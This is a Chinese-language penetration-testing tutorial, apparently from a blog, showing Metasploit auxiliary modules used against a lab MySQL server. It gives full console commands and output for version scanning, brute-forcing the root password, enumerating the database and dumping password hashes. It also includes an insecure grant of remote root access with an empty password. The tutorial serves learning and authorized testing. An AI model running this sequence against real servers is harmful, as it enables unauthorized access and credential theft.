使用辅助模块进行服务扫描,以mysql服务为例
搜索有哪些可用的mysql扫描模块
root@kali:~# msfconsole #进入msf ... msf5 > search scanner/mysql #搜索有哪些可用mysql扫描模块 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/scanner/mysql/mysql_authbypass_hashdump 2012-06-09 normal No MySQL Authentication Bypass Password Dump 1 auxiliary/scanner/mysql/mysql_file_enum normal No MYSQL File/Directory Enumerator 2 auxiliary/scanner/mysql/mysql_hashdump normal No MYSQL Password Hashdump 3 auxiliary/scanner/mysql/mysql_login normal No MySQL Login Utility 4 auxiliary/scanner/mysql/mysql_schemadump normal No MYSQL Schema Dump 5 auxiliary/scanner/mysql/mysql_version normal No MySQL Server Version Enumeration 6 auxiliary/scanner/mysql/mysql_writable_dirs normal No MYSQL Directory Write Test
1、mysql_version: 判断数据库是否允许外链,如果允许外链则可以显示版本号
msf5 > use auxiliary/scanner/mysql/mysql_version #使用mysql_version模块判断数据库是否允许外链,如果允许外链则可以显示版本号 msf5 auxiliary(scanner/mysql/mysql_version) > show options Module options (auxiliary/scanner/mysql/mysql_version): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>‘ RPORT 3306 yes The target port (TCP) THREADS 1 yes The number of concurrent threads (max one per host) msf5 auxiliary(scanner/mysql/mysql_version) > set RHOSTS 192.168.43.101 RHOSTS => 192.168.43.101 msf5 auxiliary(scanner/mysql/mysql_version) > run #此处表示目标机上的mysql不允许外链 [*] 192.168.43.101:3306 - 192.168.43.101:3306 is running MySQL, but responds with an error: \x04Host ‘PCPZ8VZPNONCTTV‘ is not allowed to connect to this MySQL server [*] 192.168.43.101:3306 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
为了测试方便,我们可以手动把目标机上的mysql设置为:允许用户远程连接。
mysql> grant all privileges on *.* to ‘root‘@‘%‘ identified by ‘‘ with grant option;
mysql> flush privileges;
下面我们重新run一遍,成功显示版本号。
msf5 auxiliary(scanner/mysql/mysql_version) > run [+] 192.168.43.101:3306 - 192.168.43.101:3306 is running MySQL 5.6.17 (protocol 10) [*] 192.168.43.101:3306 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
2、mysql_login:暴力破解
如果数据库允许外链,则能暴力破解密码
这个模块没有默认字典,新建了一个简单的pass.txt
msf5 > use auxiliary/scanner/mysql/mysql_login msf5 auxiliary(scanner/mysql/mysql_login) > show options Module options (auxiliary/scanner/mysql/mysql_login): Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE no File containing passwords, one per line Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>‘ RPORT 3306 yes The target port (TCP) STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads (max one per host) USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE no File containing usernames, one per line VERBOSE true yes Whether to print output for all attempts msf5 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.43.101 RHOSTS => 192.168.43.101 msf5 auxiliary(scanner/mysql/mysql_login) > set USERNAME root USERNAME => root msf5 auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /root/pass.txt PASS_FILE => /root/pass.txt msf5 auxiliary(scanner/mysql/mysql_login) > run #或者使用exploit命令,一样的效果 [+] 192.168.43.101:3306 - 192.168.43.101:3306 - Found remote MySQL version 5.6.17 [!] 192.168.43.101:3306 - No active DB -- Credential data will not be saved! [-] 192.168.43.101:3306 - 192.168.43.101:3306 - LOGIN FAILED: root:1 (Incorrect: Access denied for user ‘root‘@‘PCPZ8VZPNONCTTV‘ (using password: YES)) [-] 192.168.43.101:3306 - 192.168.43.101:3306 - LOGIN FAILED: root:2 (Incorrect: Access denied for user ‘root‘@‘PCPZ8VZPNONCTTV‘ (using password: YES)) [-] 192.168.43.101:3306 - 192.168.43.101:3306 - LOGIN FAILED: root:3 (Incorrect: Access denied for user ‘root‘@‘PCPZ8VZPNONCTTV‘ (using password: YES)) [-] 192.168.43.101:3306 - 192.168.43.101:3306 - LOGIN FAILED: root:4 (Incorrect: Access denied for user ‘root‘@‘PCPZ8VZPNONCTTV‘ (using password: YES)) [-] 192.168.43.101:3306 - 192.168.43.101:3306 - LOGIN FAILED: root:5 (Incorrect: Access denied for user ‘root‘@‘PCPZ8VZPNONCTTV‘ (using password: YES)) [+] 192.168.43.101:3306 - 192.168.43.101:3306 - Success: ‘root:‘ [*] 192.168.43.101:3306 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
成功破解出密码为空。
3、mysql_enum:枚举数据库信息
msf5 > use auxiliary/admin/mysql/mysql_enum #注意这里的mysql_enum在admin目录下 msf5 auxiliary(admin/mysql/mysql_enum) > show options Module options (auxiliary/admin/mysql/mysql_enum): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>‘ RPORT 3306 yes The target port (TCP) USERNAME no The username to authenticate as msf5 auxiliary(admin/mysql/mysql_enum) > set RHOSTS 192.168.43.101 RHOSTS => 192.168.43.101 msf5 auxiliary(admin/mysql/mysql_enum) > set USERNAME root #这里密码为空就不需要设置,如果不为空则还需要设置密码 msf5 auxiliary(admin/mysql/mysql_enum) > run ... 枚举的信息包括mysql版本号,操作系统架构,路径和密码hash等一些信息 ...
4、mysql_hashdump:导出密码hash
这个函数可以导出在当前登陆用户权限下可以查看账户的密码hash,多少有点鸡肋
msf5 auxiliary(admin/mysql/mysql_enum) > use auxiliary/scanner/mysql/mysql_hashdump msf5 auxiliary(scanner/mysql/mysql_hashdump) > show options Module options (auxiliary/scanner/mysql/mysql_hashdump): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>‘ RPORT 3306 yes The target port (TCP) THREADS 1 yes The number of concurrent threads (max one per host) USERNAME no The username to authenticate as msf5 auxiliary(scanner/mysql/mysql_hashdump) > set RHOSTS 192.168.43.101 RHOSTS => 192.168.43.101 msf5 auxiliary(scanner/mysql/mysql_hashdump) > set USERNAME root USERNAME => root msf5 auxiliary(scanner/mysql/mysql_hashdump) > run #这里由于root的密码为空所以没有hash。 [+] 192.168.43.101:3306 - Saving HashString as Loot: root: [+] 192.168.43.101:3306 - Saving HashString as Loot: root: [+] 192.168.43.101:3306 - Saving HashString as Loot: root: [+] 192.168.43.101:3306 - Saving HashString as Loot: : [+] 192.168.43.101:3306 - Saving HashString as Loot: root: [*] 192.168.43.101:3306 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed